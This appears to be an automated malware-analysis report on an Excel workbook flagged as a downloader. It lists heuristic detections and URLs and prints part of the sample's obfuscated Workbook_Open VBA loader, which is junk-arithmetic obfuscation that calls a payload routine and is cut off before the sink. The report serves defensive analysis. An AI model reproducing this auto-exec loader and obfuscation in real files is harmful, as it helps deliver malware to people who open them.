MALICIOUS
382
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The file contains both Excel 4.0 macros and obfuscated VBA code, including a Workbook_Open event handler that uses GetObject and CallByName. These macros are designed to execute a payload, likely by downloading it from the suspicious URL http://攮畤戯慬正潢牡ᵤ. The presence of multiple macro types and obfuscation suggests a downloader or droppper functionality.
Heuristics 10
-
ClamAV: Xls.Malware.Valyria-9756472-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Malware.Valyria-9756472-0
-
URL reconstructed from XLM cell array (3 URLs) critical OLE_XLM_CELL_ARRAY_URLExcel 4.0 macro sheet stages its payload URL across the BIFF8 Shared String Table (one quoted-char SST entry concatenated with & at runtime), across individual numeric cells (one ASCII charcode per cell), or split across multi-char fragment cells a download formula concatenates by reference (=A1&A2&… / CONCATENATE(...)). The reconstructed URL is invisible to literal-bytes URL extraction because it is never contiguous in the workbook stream. URLs were recovered by walking the BIFF8 record stream and decoding SST entries, LABELSST/RK/NUMBER cells, and FORMULA cell-reference concatenation in token order.
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
CallByName call high OLE_VBA_CALLBYNAMECallByName call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://攮畤戯慬正潢牡ᵤ Referenced by macro
- http://www.cmu.edu/blackboardReferenced by macro
- http://www.cmu.edu/blackboard/files/evaluate/tests-example.xlsReferenced by macro
- http://www.cmu.edu/blackboard/evaluate#manage_tests/import_questionscReferenced by macro
- http://www.cmu.edu/blackboard/evaluate#manage_tests/import_questionsReferenced by macro
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 5259 bytes |
SHA-256: 1c7cdc6786ec2549a8673840191b5075bee5e693039f038547e06bdc7f4310e6 |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 20 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Example Tes ' 0085 20 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Format Abbr ' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Readm ' 0085 13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - XMSV ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST ... (truncated) |
|||
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6573 bytes |
SHA-256: c3b37ce26036ada3bf9136ecf08fed60269f93633bd31389689f9d7df3ad9bd6 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Public aaa As Long
Private Function cdf9b73259bf(r, Optional v648dcc371963e As String = ",") As String()
Dim r9cf644cedf As Variant
Dim pf17c4d1e2af93() As String
ReDim r9cf644cedf(0 To Len(r))
Dim i As Double, j As Double
Dim f56c463e11, t234c6f4ce9c
f56c463e11 = r
For i = 1 To Len(r)
t234c6f4ce9c = InStr(f56c463e11, v648dcc371963e)
If t234c6f4ce9c > 0 Then
r9cf644cedf(j) = Left(f56c463e11, t234c6f4ce9c - 1)
f56c463e11 = Mid(f56c463e11, t234c6f4ce9c + 1)
j = j + 1
Else
r9cf644cedf(j) = Mid(f56c463e11, t234c6f4ce9c + 1)
Exit For
End If
Next
ReDim pf17c4d1e2af93(j)
For i = 0 To j
pf17c4d1e2af93(i) = r9cf644cedf(i)
Next
cdf9b73259bf = pf17c4d1e2af93
End Function
Sub Workbook_Open()
Dim afc6d89d516c631 As Long: afc6d89d516c631 = 5
Dim ja5ba54fd576 As String
Dim ga911f99aa9121cf7a As Long
Select Case afc6d89d516c631
Case 26 - (10 + 24) - 23
If 24 > 17 Then
Dim topper_x0 As Long
topper_x0 = (11 ^ 23) * 18
Dim topper_m0 As Long
topper_m0 = (topper_x0 - 8) / 8
Else
Dim n_next_m0 As Long
n_next_m0 = ((16 * 25) + 12)
Dim topper_mNext_0 As Long
topper_mNext_0 = (n_next_m0 - 8) ^ 24
End If
Case 14 * Int(22 / 49) - Int(3910 / 2517) * 17
If 8 > 17 Then
Dim topper_x1 As Long
topper_x1 = (9 ^ 6) - 4
Dim topper_m1 As Long
topper_m1 = (topper_x1 - 15) / 23
Else
Dim n_next_m1 As Long
n_next_m1 = ((22 / 15) + 19)
Dim topper_mNext_1 As Long
topper_mNext_1 = (n_next_m1 * 27) ^ 25
End If
Case 21 - (6 + 17) - 22
If 13 > 25 Then
Dim topper_x2 As Long
topper_x2 = (16 ^ 7) - 17
Dim topper_m2 As Long
topper_m2 = (topper_x2 * 26) / 9
Else
Dim n_next_m2 As Long
n_next_m2 = ((17 - 26) + 29)
Dim topper_mNext_2 As Long
topper_mNext_2 = (n_next_m2 + 29) ^ 17
End If
Case 27 - (4 + 22) - 25
If 22 > 11 Then
Dim topper_x3 As Long
topper_x3 = (17 ^ 6) * 9
Dim topper_m3 As Long
topper_m3 = (topper_x3 / 20) / 25
Else
Dim n_next_m3 As Long
n_next_m3 = ((22 * 21) + 17)
Dim topper_mNext_3 As Long
topper_mNext_3 = (n_next_m3 - 5) ^ 10
End If
Case 27 + (120 - 60) + 26
If 21 > 7 Then
Dim topper_x4 As Long
topper_x4 = (29 ^ 9) / 10
Dim topper_m4 As Long
topper_m4 = (topper_x4 - 21) / 4
Else
Dim n_next_m4 As Long
n_next_m4 = ((24 - 5) + 29)
Dim topper_mNext_4 As Long
topper_mNext_4 = (n_next_m4 * 7) ^ 29
End If
Case ((((5 * 8) / 4) * 4) / 8):
Dim topper_x5 As Long
topper_x5 = (22 / 4) - 12 / 12
Dim topper_m5 As Long
topper_m5 = (topper_x5 + 29) / 25
Call md2e63b5a8c15e2
Dim topper_z5 As Long
topper_z5 = (11 / 16) + 16 / 23
Dim topper_y5 As Long
topper_y5 = (topper_z5 - 20) / 15
Case 15 + (276 - 240) + 19
If 6 > 20 Then
Dim topper_x6 As Long
topper_x6 = (23 ^ 27) + 10
Dim topper_m6 As Long
topper_m6 = (topper_x6 - 24) / 9
Else
Dim n_next_m6 As Long
n_next_m6 = ((16 * 5) + 18)
Dim topper_mNext_6 As Long
topper_mNext_6 = (n_next_m6 - 13) ^ 7
End If
Case 13 / Int(14 + 8 / 11) / 13
If 20 > 6 Then
Dim topper_x7 As Long
topper_x7 = (9 ^ 17) / 25
Dim topper_m7 As Long
topper_m7 = (topper_x7 + 15) / 6
Else
Dim n_next_m7 As Long
n_next_m7 = ((10 * 10) + 5)
Dim topper_mNext_7 As Long
topper_mNext_7 = (n_next_m7 / 4) ^ 8
End If
Case 11 / Int(18 + 26 / 17) / 5
If 10 > 14 Then
Dim topper_x8 As Long
topper_x8 = (28 ^ 25) / 28
Dim topper_m8 As Long
topper_m8 = (topper_x8 - 14) / 6
Else
Dim n_next_m8 As Long
n_next_m8 = ((13 + 6) + 10)
Dim topper_mNext_8 As Long
topper_mNext_8 = (n_next_m8 - 21) ^ 16
End If
Case 16 * Int(88 / 93) - Int(2677 / 4033) * 19
If 26 > 4 Then
Dim topper_x9 As Long
topper_x9 = (15 ^ 10) * 18
Dim topper_m9 As Long
topper_m9 = (topper_x9 + 5) / 16
Else
Dim n_next_m9 As Long
n_next_m9 = ((15 + 19) + 11)
Dim topper_mNext_9 As Lo
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.